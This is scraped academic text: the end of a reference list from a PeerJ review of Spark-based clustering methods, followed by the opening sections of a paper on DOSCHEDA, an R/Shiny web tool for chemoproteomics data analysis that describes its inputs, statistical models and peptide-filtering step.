http://dx.doi.org/10.1109/AICCSA.2017.94 http://dx.doi.org/10.7717/peerj-cs.321 Bharill N, Tiwari A, Malviya A. Fuzzy based scalable clustering algorithms for han- dling big data using apache spark. IEEE Transactions on Big Data 2016:1–1 DOI 10.1109/TBDATA.2016.2622288. Bonab MB, Hashim SZM, Alsaedi AKZ, Hashim UR. 2015. Modified k-means com- bined with artificial bee colony algorithm and differential evolution for color image segmentation. In: Phon-Amnuaisuk S, Au T, eds. Computational intelligence in information systems. Advances in intelligent systems and computing, vol. 331. Cham: Springer. Chakravorty A, Rong C, Evensen P, Wlodarczyk TW. 2014. A distributed gaussian- means clustering algorithm for forecasting domestic energy usage. In: International conference on smart computing, Hong Kong. 229–236 DOI 10.1109/SMARTCOMP.2014.7043863. Chitrakar AS, Petrovic S. 2018. Analyzing digital evidence using parallel k-means with triangle inequality on spark. In: IEEE International conference on big data (Big Data), Seattle, WA, USA. Piscataway: IEEE, 3049–3058 DOI 10.1109/BigData.2018.8622430. Corizzo R, Pio G, Ceci M, Malerba D. 2019. DENCAST: distributed density-based clustering for multi-target regression. Journal of Big Data 6(1):43 DOI 10.1186/s40537-019-0207-2. Dave M, Gianey H. 2016. Different clustering algorithms for Big Data analytics: a review. In: International conference system modeling & advancement in research trends (SMART), Moradabad. 328–333 DOI 10.1109/SYSMART.2016.7894544. Ding D, Li J, Wang H, Liang Z. 2017. Student behavior clustering method based on campus big data. In: 13th international conference on computational intelligence and security (CIS), Hong Kong. 500–503 DOI 10.1109/CIS.2017.00116. Fasheng L, Xiong L. 2011. Survey on text clustering algorithm -Research present situation of text clustering algorithm. In: 2011 IEEE 2nd international conference on software engineering and service science, Beijing. Piscataway: IEEE, 196–199 DOI 10.1109/ICSESS.2011.5982288. Fatta G, Al Ghamdi S. 2019. Efficient clustering techniques on hadoop and spark. International Journal of Big Data Intelligence 6(3–4):269–290. Gao ZQ, Zhang LJ. 2017. DPHKMS: an efficient hybrid clustering preserving differential privacy in spark. In: International conference on emerging internetworking, data & web technologies. Gong Y, Sinnott RO, Rimba P. RT-DBSCAN: real-time parallel clustering of spatio- temporal data using spark-streaming. In: Shi Y, et al., eds. Computational science— ICCS 2018. ICCS 2018. Lecture notes in computer science, vol. 10860. Cham: Springer. Gousios G. 2018. Big data software analytics with Apache Spark. In: Proceedings of the 40th international conference on software engineering: companion proceeed- ings(ICSE ’18). New York: Association for Computing Machinery, 542–543 DOI 10.1145/3183440.3183458. Guo Y, Zhang J, Zhang Y. 2016. An algorithm for analyzing the city residents’ activity information through mobile big data mining. In: IEEE Trustcom/BigDataSE/ISPA, Tianjin. Piscataway: IEEE, 2133–2138 DOI 10.1109/TrustCom.2016.0328. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 23/28 https://peerj.com http://dx.doi.org/10.1109/TBDATA.2016.2622288 http://dx.doi.org/10.1109/SMARTCOMP.2014.7043863 http://dx.doi.org/10.1109/BigData.2018.8622430 http://dx.doi.org/10.1186/s40537-019-0207-2 http://dx.doi.org/10.1109/SYSMART.2016.7894544 http://dx.doi.org/10.1109/CIS.2017.00116 http://dx.doi.org/10.1109/ICSESS.2011.5982288 http://dx.doi.org/10.1145/3183440.3183458 http://dx.doi.org/10.1109/TrustCom.2016.0328 http://dx.doi.org/10.7717/peerj-cs.321 Han D, Agrawal A, Liao W, Choudhary A. 2018a. A fast DBSCAN algorithm with spark implementation. In: Big data in engineering applications. Studies in big data, vol. 44. Singapore: Springer. Han D, Agrawal A, Liao W, Choudhary A. 2018b. Parallel DBSCAN algorithm using a data partitioning strategy with spark implementation. In: IEEE international conference on big data (Big Data), Seattle, WA, USA. Piscataway: IEEE, 305–312 DOI 10.1109/BigData.2018.8622258. Hartigan JA, Wong MA, Algorithm AS. 1979. A k-means clustering algorithm. Journal of the Royal Statistical Society Series C 28(1):100–108. Hasan RA, Alhayali RA, Zaki ND, Ali AH. 2019. An adaptive clustering and clas- sification algorithm for Twitter data streaming in Apache Spark. TELKOM- NIKA Telecommunication Computing Electronics and Control 17:3086–3099 DOI 10.12928/telkomnika.v17i6.11711. Hassani M, Spaus P, Cuzzocrea A, Seidl T. 2016. I-hastream: density-based hierarchical clustering of big data streams and its application to big graph analytics tools. In: 16th IEEE/ACM international symposium on cluster, cloud and grid computing (CCGrid). Piscataway: IEEE, 656–665. Hosseini B, Kiani K. 2018. A robust distributed big data clustering-based on adaptive density partitioning using apache spark. Symmetry 10:342 DOI 10.3390/sym10080342. Hosseini B, Kourosh K. 2019. A big data driven distributed density based hes- itant fuzzy clustering using Apache spark with application to gene expres- sion microarray. Engineering Applications of Artificial Intelligence 79:100–113 DOI 10.1016/j.engappai.2019.01.006. Hu S, Xiao Z, Rao Q, Liao R. 2018. An anomaly detection model of user behavior based on similarity clustering. In: 2018 IEEE 4th information technology and mechatronics engineering conference (ITOEC), Chongqing, China. Piscataway: IEEE, 835–838 DOI 10.1109/ITOEC.2018.8740748. Huang F, Zhu Q, Zhou J, Tao J, Zhou X, Jin D, Tan X, Wang L. 2017. Research on the parallelization of the DBSCAN clustering algorithm for spatial data mining based on the spark platform. Remote Sensing 9(12):1301 DOI 10.3390/rs9121301. Huang Z. 1998. Extensions to the k-means algorithm for clustering large data sets with categorical values. Data Mining and Knowledge Discovery 2(3):283–304 DOI 10.1023/A:1009769707641. Ianni M, Masciari E, Mazzeo GM, Mezzanzanica M, Zaniolo C. 2020. Fast and effective Big Data exploration by clustering. Future Generation Computer Systems 102:84–94 DOI 10.1016/j.future.2019.07.077. Jain AK. 2010. Data clustering: 50 years beyond k-means. Pattern Recognition Letters 31(8):651–666 DOI 10.1016/j.patrec.2009.09.011. Jiang D, Ooi B, Shi L, Wu S. 2010. Big data processing using hadoop: survey on schedul- ing. Proceedings of the VLDB Endowment 3(10):272–277. Jin C, Liu R, Chen Z, Hendrix W, Agrawal A, Choudhary A. 2015. A scalable hierarchical clustering algorithm using spark. In: IEEE first international conference on big data Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 24/28 https://peerj.com http://dx.doi.org/10.1109/BigData.2018.8622258 http://dx.doi.org/10.12928/telkomnika.v17i6.11711 http://dx.doi.org/10.3390/sym10080342 http://dx.doi.org/10.1016/j.engappai.2019.01.006 http://dx.doi.org/10.1109/ITOEC.2018.8740748 http://dx.doi.org/10.3390/rs9121301 http://dx.doi.org/10.1023/A:1009769707641 http://dx.doi.org/10.1016/j.future.2019.07.077 http://dx.doi.org/10.1016/j.patrec.2009.09.011 http://dx.doi.org/10.7717/peerj-cs.321 computing service and applications, Redwood City, CA. Piscataway: IEEE, 418–426 DOI 10.1109/BigDataService.2015.67. Kamaruddin S, Ravi V, Mayank P. Parallel evolving clustering method for big data analytics using apache spark: applications to banking and physics. In: Reddy P, Sureka A, Chakravarthy S, Bhalla S, eds. Big data analytics. BDA 2017. Lecture notes in computer science, vol. 10721. Cham: Springer. Ketu S, Agarwal S. 2015. Performance enhancement of distributed k-Means clus- tering for big Data analytics through in-memory computation. In: Eighth international conference on contemporary computing (IC3), Noida. 318–324 DOI 10.1109/IC3.2015.7346700. Kim J, Shin M, Kim J, Park C, Lee S, Woo J, Park S , et al. 2018. CASS: a distributed network clustering algorithm based on structure similarity for large-scale network. PLOS ONE 13:e0203670 DOI 10.1371/journal.pone.0203670. Kusuma I, Ma’sum MA, Habibie N, Jatmiko W, Suhartanto H. 2016. Design of intelligent k-means based on spark for big data clustering. In: Interna- tional workshop on big data and information security (IWBIS), Jakarta. 89–96 DOI 10.1109/IWBIS.2016.7872895. Labrinidis A, Jagadish HV. 2012. Challenges and opportunities with big data. Proceedings of the VLDB Endowment 5(12):2032–2033 DOI 10.14778/2367502.2367572. Lavanya K, Sairabanu J, Jain P. 2019. Clustering of Zika virus epidemic using Gaussian mixture model in spark environment. Biomedical Research-tokyo 30:127–133. Lee S, Kim D. Distributed-based hierarchical clustering system for large-scale semicon- ductor wafers. In: 2018 IEEE international conference on industrial engineering and engineering management (IEEM). Piscataway: IEEE, 1528–1532. Liang M, Li Q, Geng Y, Wang J, Wei Z. 2017. REMOLD: an efficient model-based clustering algorithm for large datasets with spark. In: IEEE 23rd international conference on parallel and distributed systems (ICPADS), Shenzhen. Piscataway: IEEE, 376–383. Lighari SN, Hussain DMA. 2017. Hybrid model of rule based and clustering anal- ysis for big data security. In: First international conference on latest trends in electrical engineering and computing technologies (INTELLECT), Karachi. 1–5 DOI 10.1109/INTELLECT.2017.8277627. Liu B, He S, He D, Zhang Y, Guizani M. 2019. A spark-based parallel fuzzy c -means segmentation algorithm for agricultural image big data. IEEE Access 7:42169–42180 DOI 10.1109/ACCESS.2019.2907573. Lulli A, Dell’Amico M, Ricci L. 2016. NG-DBSCAN: scalable density-based clus- tering for arbitrary data. Proceedings of the VLDB Endowment 10:157–168 DOI 10.14778/3021924.3021932. Luo G, Luo X, Gooch TF, Tian L, Qin K. 2016. A parallel DBSCAN algorithm based on spark. In: IEEE international conferences on big data and cloud computing (BDCloud), social computing and networking (SocialCom), sustainable computing and communi- cations (SustainCom) (BDCloud-SocialCom-SustainCom), Atlanta, GA. Piscataway: IEEE, 548–553 DOI 10.1109/BDCloud-SocialCom-SustainCom.2016.85. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 25/28 https://peerj.com http://dx.doi.org/10.1109/BigDataService.2015.67 http://dx.doi.org/10.1109/IC3.2015.7346700 http://dx.doi.org/10.1371/journal.pone.0203670 http://dx.doi.org/10.1109/IWBIS.2016.7872895 http://dx.doi.org/10.14778/2367502.2367572 http://dx.doi.org/10.1109/INTELLECT.2017.8277627 http://dx.doi.org/10.1109/ACCESS.2019.2907573 http://dx.doi.org/10.14778/3021924.3021932 http://dx.doi.org/10.1109/BDCloud-SocialCom-SustainCom.2016.85 http://dx.doi.org/10.7717/peerj-cs.321 Maheshwar RC, Haritha D. 2016. Surveyon high performance analytics of big data with apache spark. In: 2016 International conference on advanced communication control and computing technologies (ICACCCT), Ramanathapuram. 721–725 DOI 10.1109/ICACCCT.2016.7831734. Mallios X, Vassalos V, Venetis T, Vlachou A. A framework for clustering, classification of big data using spark. In: Debruyne C, et al., eds. On the move to meaningful internet systems: OTM 2016 conferences. OTM 2016. Lecture notes in computer science, vol. 10033. Cham: Springer,. Malondkar A, Corizzo R, Kiringa I, Ceci M, Japkowicz N. 2019. Spark-GHSOM: growing hierarchical self-organizing map for large scale mixed attribute datasets. Information Sciences 496:572–591 DOI 10.1016/j.ins.2018.12.007. Manwal M, Gupta A. 2017. Big data and hadoop—a technological survey. In: Interna- tional conference on emerging trends in computing and communication technologies (ICETCCT), Dehradun. 1–6. Mishra DD, Pathan S, Murthy C. 2018. Apache spark based analytics of squid proxy logs. In: IEEE international conference on advanced networks and telecommunications sys- tems (ANTS), Indore, India. Piscataway: IEEE, 1–6 DOI 10.1109/ANTS.2018.8710044. Othman SM, Ba-Alwi FM, Alsohybe NT, Al-Hashida AY. 2018. Intrusion detection model using machine learning algorithm on Big Data environment. Journal of Big Data 5:34 DOI 10.1186/s40537-018-0145-4. Pang H, Deng L, Wang L, Fei M. The application of spark-based gaussian mixture model for farm environmental data analysis. In: Zhang L, Song X, Wu Y, eds. Theory, methodology, tools and applications for modeling and simulation of complex systems. AsiaSim 2016, SCS AutumnSim 2016. Communications in computer and information science, vol. 645. Singapore: Springer. Rotsnarani S, Mrutyunjaya P. 2015. Big data analysis using Hadoop: a survey. Interna- tional Journal of Advanced Research in Computer Science and Software Engineering 5(7):1153–1157. Rui L, Xiaoge L, Liping D, Shuting Z, Mian W. 2017. Parallel implementation of density peaks clustering algorithm based on spark. Procedia Computer Science 107:442–447 DOI 10.1016/j.procs.2017.03.138. Rujal B, Dabhi D. 2016. Extensive survey on k-means clustering using mapreduce in datamining. In: Conference: international conference on electronics and communication systems (ICECS) At: Coimbatore, Tamilnadu, India. Salloum S, Dautov R, Chen X, Peng PX, Huang JZ. 2016. Big data analytics on apache spark. International Journal of Data Science and Analytics 1(3):145–164 DOI 10.1007/s41060-016-0027-9. Santhi V, Jose R. 2018. Performance analysis of parallel k-means with optimization al- gorithms for clustering on spark. In: Negi A, Bhatnagar R, Parida L, eds. Distributed computing and internet technology. ICDCIT 2018. Lecture notes in computer science, vol. 10722. Cham: Springer,. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 26/28 https://peerj.com http://dx.doi.org/10.1109/ICACCCT.2016.7831734 http://dx.doi.org/10.1016/j.ins.2018.12.007 http://dx.doi.org/10.1109/ANTS.2018.8710044 http://dx.doi.org/10.1186/s40537-018-0145-4 http://dx.doi.org/10.1016/j.procs.2017.03.138 http://dx.doi.org/10.1007/s41060-016-0027-9 http://dx.doi.org/10.7717/peerj-cs.321 Sarazin T, Azzag H, Lebbah M. 2014. SOM clustering using spark-mapReduce. In: 2014 IEEE international parallel & distributed processing symposium workshops, Phoenix, AZ. Piscataway: IEEE, 1727–1734 DOI 10.1109/IPDPSW.2014.192. Sarazin T, Lebbah M, Azzag H. 2014. Biclustering using spark-mapreduce. In: IEEE international conference on big data (Big Data), Washington, DC. Piscataway: IEEE, 58–60 DOI 10.1109/BigData.2014.7004493. Sembiring RW, Jasni MZ, Embong A. 2010. Clustering high dimensional data using subspace and projected clustering algorithms. International Journal of Computer Science & Information Technology 2:162–170 DOI 10.5121/ijcsit.2010.2414. Shah J. 2016. New clustering using spark. International Journal of Latest Technology in Engineering, Management & Applied Science 5(9):58–61. Shanjiang T, He B, Yu C, Li Y, Li K. 2018. A survey on spark ecosystem for big data processing. Sharma T, Shokeen V, Mathur D. 2016. Multiple k-Means++ clustering of satellite image using Hadoop Mapreduce and Spark. International Journal of Advanced Studies in Computer Science and Engineering 5(4). Sherar M, Zulkernine F. 2017. Particle swarm optimization for large-scale clustering on apache spark. In: 2017 IEEE symposium series on computational intelligence (SSCI), Honolulu, HI. Piscataway: IEEE, 1–8 DOI 10.1109/SSCI.2017.8285208. Shirkhorshidi AS, Aghabozorgi S, Wah TY, Herawan T. Big data clustering: a review. In: Computational science and its applications –ICCSA 2014. ICCSA 2014. Lecture notes in computer science, vol 8583. Cham: Springer. Shobanadevi A, Maragatham G. 2017. Studying the performance of clusteringtechniques for biomedical data using spark. In: 2017 International conference on intelligent sustainable systems (ICISS), Palladam. 58–65 DOI 10.1109/ISS1.2017.8389249. Shoro SAG, Soomro TR. 2015. Big data analysis: apache Spark perspective. Global Journal of Computer Science and Technology 15(1). Sinha A, Jana PK. 2016. A novel k-means based clustering algorithm for big data. In: International conference on advances in computing, communications and informatics (ICACCI), Jaipur. 1875–1879. Solaimani M, Iftekhar M, Khan L, Thuraisingham B, Ingram JB. Spark-based anomaly detection over multi-source VMware performance data in real-time. In: 2014 IEEE symposium on computational intelligence in cyber security (CICS). Piscataway: IEEE, 1–8. Solaimani M, Iftekhar M, Khan L, Thuraisingham B, Ingram JB. 2014. Spark-based anomaly detection over multi-source VMware performance data in real-time. In: IEEE symposium on computational intelligence in cyber security (CICS), Orlando, FL. Piscataway: IEEE, 1–8 DOI 10.1109/CICYBS.2014.7013369. Sood S, Singh R. 2019. A survey of performance improvement techniques for hadoop. International Journal of Applied Engineering Research 10(55):2481–2486. Thakur S, Dharavath R. 2018. KMDT: a hybrid cluster approach for anomaly detection using big data. In: Information and decision sciences. Advances in intelligent systems and computing, vol. 701. Singapore: Springer. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 27/28 https://peerj.com http://dx.doi.org/10.1109/IPDPSW.2014.192 http://dx.doi.org/10.1109/BigData.2014.7004493 http://dx.doi.org/10.5121/ijcsit.2010.2414 http://dx.doi.org/10.1109/SSCI.2017.8285208 http://dx.doi.org/10.1109/ISS1.2017.8389249 http://dx.doi.org/10.1109/CICYBS.2014.7013369 http://dx.doi.org/10.7717/peerj-cs.321 Verma A, Mansuri AH, Jain N. 2016. Big data management processing with Hadoop MapReduce and spark technology: a comparison. In: 2016 Symposium on Colossal- Data Analysis and Networking (CDAN), Indore. 1–4 DOI 10.1109/CDAN.2016.7570891. Wang B, Yin J, Hua Q, Wu Z, Cao J. 2016. Parallelizing k-Means-Based Clustering on Spark. In: 2016 International conference on advanced cloud and big data (CBD), Chengdu. 31–36 DOI 10.1109/CBD.2016.016. Wang Y, Qian Q. 2018. A spark-based artificial bee colony algorithm for large- scale data clustering. In: IEEE 20th international conference on high perfor- mance computing and communications; IEEE 16th international conference on smart city; IEEE 4th international conference on data science and systems (HPC- C/SmartCity/DSS), Exeter, United Kingdom. Piscataway: IEEE, 1213–1218 DOI 10.1109/HPCC/SmartCity/DSS.2018.00204. Win KN, Chen J, Chen Y, Fournier-Viger P. 2019a. PCPD: a parallel crime pattern discovery system for large-scale spatiotemporal data based on fuzzy clustering. In- ternational Journal of Fuzzy Systems 21:1961–1974 DOI 10.1007/s40815-019-00673-3. Win KN, Chen J, Xiao G, Chen Y, Viger PF. 2019b. A parallel crime activity clustering algorithm based on apache spark cloud computing platform. In: IEEE 21st interna- tional conference on high performance computing and communications; Zhangjiajie, China. 68–74 DOI 10.1109/HPCC/SmartCity/DSS.2019.00025. Wu J, Wu Z, Cao J, Liu H, Chen G, Zhang Y. 2017. Fuzzy consensus clustering with applications on big data. IEEE Transactions on Fuzzy Systems 25(6):1430–1445 DOI 10.1109/TFUZZ.2017.2742463. Xin RS, Gonzalez JE, Franklin MJ, Stoica I. 2013. Graphx: aresilient distributed graph system on spark. In: First international workshop on graph data management experi- ences and systems. 1–2:6. Xu D, Tian Y. 2015. A comprehensive survey of clustering algorithms. Annals of Data Science 2(2):165–193 DOI 10.1007/s40745-015-0040-1. Zayani A, Ben N’Cir C, Essoussi N. 2016. Parallel clustering method for non-disjoint partitioning of large-scale data based on spark framework. In: IEEE international conference on big data (Big Data), Washington, DC. Piscataway: IEEE, 1064–1069. Zerhari B, Lahcen AA, Mouline S. 2015. Big data clustering: algorithms and challenges. In: Proceedings of the international conference on big data, cloud and applications, Tetuan, Morocco. 25–26. Zhang Y, Liu H, Chen T, Tang D. 2019. A distributed PCM clustering algorithm based on spark. In: Proceedings of the 2019 11th international conference on machine learning and computing (ICMLC ’19). New York: Association for Computing Machinery, 70–74 DOI 10.1145/3318299.3318315. Zhou Q, Wang J. SparkSCAN: a structure similarity clustering algorithm on spark. In: Big data technology and applications. BDTA 2015. Communications in computer and information science, vol. 590. Singapore: Springer. Saeed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.321 28/28 https://peerj.com http://dx.doi.org/10.1109/CDAN.2016.7570891 http://dx.doi.org/10.1109/CBD.2016.016 http://dx.doi.org/10.1109/HPCC/SmartCity/DSS.2018.00204 http://dx.doi.org/10.1007/s40815-019-00673-3 http://dx.doi.org/10.1109/HPCC/SmartCity/DSS.2019.00025 http://dx.doi.org/10.1109/TFUZZ.2017.2742463 http://dx.doi.org/10.1007/s40745-015-0040-1 http://dx.doi.org/10.1145/3318299.3318315 http://dx.doi.org/10.7717/peerj-cs.321 work_r6pcfgi7a5ejnbnkrndajtj3t4 ---- Submitted 9 March 2017 Accepted 20 July 2017 Published 28 August 2017 Corresponding author Piero Ricchiuto, ricchiuto.piero@gmail.com Academic editor Robert Winkler Additional Information and Declarations can be found on page 9 DOI 10.7717/peerj-cs.129 Copyright 2017 Contrino et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS DOSCHEDA: a web application for interactive chemoproteomics data analysis Bruno Contrino1, Eric Miele2, Ronald Tomlinson2, M. Paola Castaldi2 and Piero Ricchiuto1 1 Department of Quantitative Biology, Discovery Sciences, AstraZeneca, Cambridge, United Kingdom 2 Department of Chemical Biology, Discovery Biology, Discovery Sciences, AstraZeneca, Waltham, MA, United States of America ABSTRACT Background. Mass Spectrometry (MS) based chemoproteomics has recently become a main tool to identify and quantify cellular target protein interactions with ligands/drugs in drug discovery. The complexity associated with these new types of data requires scientists with a limited computational background to perform systematic data quality controls as well as to visualize the results derived from the analysis to enable rapid decision making. To date, there are no readily accessible platforms specifically designed for chemoproteomics data analysis. Results. We developed a Shiny-based web application named DOSCHEDA (Down Stream Chemoproteomics Data Analysis) to assess the quality of chemoproteomics experiments, to filter peptide intensities based on linear correlations between replicates, and to perform statistical analysis based on the experimental design. In order to increase its accessibility, DOSCHEDA is designed to be used with minimal user input and it does not require programming knowledge. Typical inputs can be protein fold changes or peptide intensities obtained from Proteome Discover, MaxQuant or other similar software. DOSCHEDA aggregates results from bioinformatics analyses performed on the input dataset into a dynamic interface, it encompasses interactive graphics and enables customized output reports. Conclusions. DOSCHEDA is implemented entirely in R language. It can be launched by any system with R installed, including Windows, Mac OS and Linux distributions. DOSCHEDA is hosted on a shiny-server at https://doscheda.shinyapps.io/doscheda and is also available as a Bioconductor package (http://www.bioconductor.org/). Subjects Bioinformatics Keywords Quantitative Chemoproteomics, Statistical Models, Web interface, Shiny, TMT, iTRAQ, Proteomics, Quantitative Chemical biology, Drug dose-response, Protein drug profiling BACKGROUND Many drugs fail in the clinic for lack of efficacy or for toxicity and as such, some of the most important steps in drug discovery are evaluation of target engagement and off-targets liabilities. Next Generation Sequencing (NGS) and mass spectrometry proteomics-based drug discovery (Jones & Neubert, 2017) approaches offer unique How to cite this article Contrino et al. (2017), DOSCHEDA: a web application for interactive chemoproteomics data analysis. PeerJ Comput. Sci. 3:e129; DOI 10.7717/peerj-cs.129 https://peerj.com mailto:ricchiuto.piero@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.129 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doscheda.shinyapps.io/doscheda http://www.bioconductor.org/ http://dx.doi.org/10.7717/peerj-cs.129 opportunities to deeply characterize drug-targets biology and pharmaceutical agents (Bantscheff et al., 2007; Bantscheff et al., 2008). Quantitative chemical proteomics (Bantscheff & Drewes, 2012) and MS-Cellular Thermal Shift Assay (MS-CETSA) (Martinez & Nordlund, 2016) have been recently deployed in drug discovery to aid target deconvolution in the context of phenotypic screens, to elucidate drugs’ mechanisms of action and evaluation of drug repurposing (Schirle, Bantscheff & Kuster, 2012). A generous number of computational tools has been developed for MS-spectral analysis and protein quantification, such as Proteome Discoverer (https://www.thermofisher.com/), MaxQuant (Cox & Mann, 2008) or PEAKS (http://www1.bioinfor.com) for de novo peptide sequencing. However, the increasing variety of MS based approaches for drug target deconvolution can produce data that need dedicated downstream analysis platforms for facilitating the biological interpretation of results. Here, we focus on quantitative chemoproteomics used to determine protein interaction profiles of small molecules from whole cell or tissue lysates (Manning, 2002). Chemoproteomics includes reverse competition-based experiments that, in combination with quantitative MS (e.g., tandem mass tags (TMT) or isobaric tag for relative quantification (iTRAQ)), are used for rank-ordering of small molecule-protein interactions by binding affinity (Bantscheff & Drewes, 2012). Although several comprehensive analysis pipelines, such as OCAP (Wang, Yang & Yang, 2012), ProSightPC (http://proteinaceous.net/software/), TopPIC (Kou, Xun & Liu, 2016), MSstats (Choi et al., 2014), Skyline (MacLean et al., 2010), MaxQuant & Perseus (Tyanova et al., 2016) and DAPAR & ProStaR (Wieczorek et al., 2017), have been developed for the downstream data analysis, to the best of our knowledge there are no tools specifically designed to facilitate chemoproteomics data analysis for scientists with a limited computational background and available as a public server application. Based on this, we have developed a Shiny-based web application named DOSCHEDA (Down Stream Chemoproteomics Data Analysis), which includes: (i) an open-source code available on Bioconductor for R-users; (ii) a user-friendly Graphical User Interface (GUI) with no programming knowledge required (iii) a traffic-light system to enable the user to rapidly identify and address data incongruences; (iv) an OS-independent implementation which generates a comprehensive final report in addition to analysis results; (v) a flexible data-input routine which enables the user to import different file types (.txt, .xlsx, .csv), typically exported from MS-software such as Proteome Discover or MaxQuant; (vi) the CRAPome flagged proteins based on the contaminant repository database (Mellacheruvu et al., 2013) DOSCHEDA addresses the need to perform fit for purpose statistical analysis of chemoproteomics experiments, including linear and non-linear models, to provide a ranking of the protein(s) most competed by the investigational compound (the competitor) as well as to generate standardized results that can be further used for downstream analysis or for different experiment comparisons. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 2/11 https://peerj.com https://www.thermofisher.com/ http://www1.bioinfor.com http://proteinaceous.net/software/ http://dx.doi.org/10.7717/peerj-cs.129 Table 1 Required inputs for DOSCHEDA. Input data from PD2.1 Input data not from PD2.1 Peptide intensities Peptide qvality score, protein accessions, peptide names, intensities Peptide qvality score, protein accessions, peptide names, intensities Fold changes Protein fold changes Protein accessions, protein fold changes, unique peptides Log-fold changes Protein log-fold changes Protein accessions, protein log-fold changes, unique peptides IMPLEMENTATION DOSCHEDA is implemented using R (R Core Team, 2014), an open-source software for statistical computing and coded in Shiny (Chang et al., 2015). DOSCHEDA processes the data based on a series of pipelines developed and integrated into the application. The user selects what pipeline to be executed based on the experimental design and data input. Data input The application is designed to take three different types of data: 1. Peptide Intensities. These are obtained from Proteome Discoverer, MaxQuant or similar software. The same procedure applied in Proteome Discoverer 2.1 has been implemented in DOSCHEDA for summing the reporter ions to protein relative quantification. The protein fold changes [Ctrl]/[treated] are then converted to log2 scale and then passed into the pipeline. 2. Fold Changes. These are the protein fold changes, [Ctrl]/[treated]. 3. Log2 Fold Changes. These are the log2 protein fold changes. DOSCHEDA has been optimized for Proteome Discoverer 2.1 (PD 2.1), but it can also use data from other software given that the input file contains specific columns as described in Table 1. Statistical analyses The experimental design as shown in Table 2 will determine the type of analysis that can be performed in DOSCHEDA. The standard pipeline utilizes a linear model with a quadratic form f (x)=a0+a1x+a2x 2 where a0 is the intercept, a1 the slope and a2 the quadratic coefficient. This pipeline is suitable for experimental designs with less than 5 channels (4-plex) and more than 1 replicate (Table 2). Increasing free drug concentrations and generation of a dose-response relationship with the protein target(s) provides information about specific drug-target interactions. The linear model analysis implemented in DOSCHEDA by using the limma R package (Smyth, 2004) will identify proteins with a significant p value (slope, intercept, quadratic) as the protein drug-target(s). Alternatively, in cases where biological input material is not a limiting factor, chemoproteomics experiments consist of a full-scale dose-response, in which 5 or more Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 3/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129 Table 2 Type of analysis performed in DOSCHEDA. 1 Replicate More than 1 replicate Less than 5 channels Not enough data Linear model 5 or more channels Sigmoidal Linear model concentrations are tested (e.g., 6-plex or 10-plex). In this case, the user can run the sigmoidal pipeline where the four-parameter log- logistic (Ritz et al., 2015) model is applied (Table 2). Here, the p values of the model parameters (min, max, slope, RB50) will be computed to rank proteins based on their selectivity profile (Smyth & Collins, 2009). The half maximal residual binding (RB50) is a measure of the effectiveness of a drug in binding to a protein. Thus, this quantitative measure indicates how much of a drug or small molecule is needed to saturate binding to a protein by half, and can be used to compare drug-protein profiles. The RB50 values are typically expressed as molar concentration and are computed in the sigmoidal pipeline for each protein within DOSCHEDA. Furthermore, the corrected RB50, according to Daub (2015) corresponds to the ratio (r) of the proteins enriched in the second incubation (supernatant) versus those retained in the first incubation (DMSO or blank) with the affinity matrix. This pulldown of pulldown or depletion factor (r) enables the calculation of a Kd for each protein and it will be part of DOSCHEDA’s outputs. Peptide removal process using Pearson correlation When peptide intensities and two replicates are available, DOSCHEDA implements a prior step to the peptide aggregation process to consider of potential technical experimental errors. The peptide removal function is tailored having in mind the typical chemoproteomics experimental design and aims to leverage the empirical peptides information of experimental replicates avoiding data imputation or using spectra features of peptides (Fischer & Renard, 2016) as they might not be necessarily available information to the final user. The peptide removal algorithm is described in Fig. 1, in this procedure peptides that are inconsistent (e.g., anti-correlate) between replicates are excluded. This implementation is not intended to address the ratio compression (Savitski et al., 2013) but to leverage the information available on the same peptide between the two replicates. In fact, the peptide removal process is based on the calculation of the Pearson correlation coefficient between the same peptide abundances of two replicates as a pre-filtering step before summing the remaining peptide intensities to finally infer back the protein abundance. Initially, the peptides are filtered by their Peptide Quality score (Qs < 0.05) column, a mandatory input column in this case. Next, data are filtered to have a minimum of 2 peptides (shared or unique) per protein and per replicate such that the Pearson correlation coefficient (R2) can be calculated between matched peptides. Peptides with R2 < 0.4 are removed and summed intensities are computed from the remaining peptides; although this cut-off can be modified by the user within DOSCHEDA, we observed that 0.4 is a reasonable default threshold that removes extreme peptide quantifications (e.g., low correlated and Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 4/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129 Figure 1 Schematic of the Peptide Removal process algorithm. Table 3 Summary scenarios in peptide removal process. Prot. name Peptides Rep1 Peptides Rep2 Pearson correlation coefficient Action Protein 1 A, B A, B RA>0.4 RB>0.4 No removal, computed the summed intensities as in PD2.1 Protein 2 A, B A NULL Lack of peptide measurements; Protein 2 will be removed Protein 3 A, B, C A, B, C RA>0.4 RB>0.4 RC <0.4 A, B considered and summed. C is removed, reason of noise in the data Notes. A,B,C in the real case scenario are peptide sequences. anti-correlated peptides) and keeps almost unchanged the proteome coverage, as shown in Fig. 2 R2 < 0.4. Intuitively, larger R2 values will reflect into a larger peptide removal and consequently proteins loss as shown by Figs. 2A–2D. The R2 can be adjusted by the user within DOSCHEDA allowing quick results comparison in a similar fashion of Fig. 2 and, empowering the analyst to fine tuning this threshold based on project aims. Finally, only proteins with more than one unique peptide are retained for the downstream analysis. Table 3 summarizes all the possible scenarios handled by the peptide removal function. Contrino et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.129 5/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.129 Figure 2 Effect of different Pearson coefficient cut offs. X- and Y -axis are Log2 fold changes. The total number of proteins 1,360 (A, 100%) reduces to 1,084 with Pearson coefficient R2 =0.2 (B,∼80%), 1,044 with R2 